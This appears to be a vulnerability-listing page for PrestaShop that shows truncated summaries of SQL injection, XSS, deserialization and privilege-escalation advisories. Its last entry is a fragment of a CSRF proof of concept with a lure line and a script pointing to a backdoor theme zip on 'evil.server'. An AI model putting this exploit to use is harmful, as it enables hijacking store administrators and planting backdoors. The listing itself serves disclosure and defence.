CVE-2023-45387

In the module "Product Catalog CSV, Excel, XML Export PRO" exportproducts in versions up to 5.0.0 from MyPrestaModules for PrestaShop, a guest can perform SQL injection via exportProduct::addDataToDb...

CVE-2023-31671

PrestaShop postfinance = 17.1.13 is vulnerable to SQL Injection via PostfinanceValidationModuleFrontController::postProcess...

CVE-2013-6295

PrestaShop 1.5.5 vulnerable to privilege escalation via a Salesman account via upload module...

EUVD-2023-49671

Malicious code in bioql PyPI...

GHSA-8XX5-H6M3-JR33 Presta Shop vulnerable to email enumeration

Impact An unauthenticated attacker with access to the back-office URL can manipulate the idemployee and resettoken parameters to enumerate valid back-office employee email addresses. Impacted parties: Store administrators and employees: their email addresses are exposed. Merchants: risk of...

CVE-2025-25692

A PHAR deserialization vulnerability in the getHeaders function of PrestaShop v8.2.0 allows attackers to execute arbitrary code via a crafted POST request...

CVE-2024-24303

SQL Injection vulnerability in HiPresta "Gift Wrapping Pro" hiadvancedgiftwrapping module for PrestaShop before version 1.4.1, allows remote attackers to escalate privileges and obtain sensitive information via the HiAdvancedGiftWrappingGiftWrappingModuleFrontController::addGiftWrappingCartValue...

CVE-2023-50030

In the module "Jms Setting" jmssetting from Joommasters for PrestaShop, a guest can perform SQL injection in versions = 1.1.0. The method JmsSetting::getSecondImgs has a sensitive SQL call that can be executed with a trivial http call and exploited to forge a blind SQL injection...

CVE-2023-30154

Multiple improper neutralization of SQL parameters in module AfterMail aftermailpresta for PrestaShop, before version 2.2.1, allows remote attackers to perform SQL injection attacks via idcustomer, idconf, idproduct and token parameters in aftermailajax.php via the 'idproduct' parameter in hooks...

CVE-2011-3796

PrestaShop 1.4.0.6 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by product-sort.php and certain other files...

CVE-2024-41651

An issue in Prestashop v.8.1.7 and before allows a remote attacker to execute arbitrary code via the module upgrade functionality. NOTE: this is disputed by multiple parties, who report that exploitation requires that an attacker be able to hijack network requests made by an admin user who, by...

CVE-2024-34716 PrestaShop vulnerable to XSS via customer contact form in FO, through file upload

PrestaShop is an open source e-commerce web application. A cross-site scripting XSS vulnerability that only affects PrestaShops with customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled throu...

CVE-2024-25844

An issue was discovered in Common-Services "So Flexibilite" soflexibilite module for PrestaShop before version 4.1.26, allows remote attackers to escalate privileges and obtain sensitive information via debug file...

PT-2024-20346 · Prestashop · Hipresta Gift Wrapping Pro

Name of the Vulnerable Software and Affected Versions: HiPresta Gift Wrapping Pro module for PrestaShop versions prior to 1.4.1 Description: The issue allows remote attackers to escalate privileges and obtain sensitive information via the...

PrestaShop Correos Express Information Disclosure Vulnerability

PrestaShop is a set of open source e-commerce solutions from PrestaShop, USA. The program provides a variety of payment methods , SMS alerts and product image scaling and other features . Correos Express is one of the logistics management plug-ins . A security vulnerability exists in Correos...

Prestashop 1.7.6.4 - Cross-Site Request Forgery

This is totally a legit page. Just keep reading this for a minute : history.pushState'', '', '/' var target = "http://localhost"; //change this var adminurl = "/admin123ab45cd"; //change this var themeurl = "http://evil.server/backdoor-theme.zip"; //change this - link to the malicious theme zip...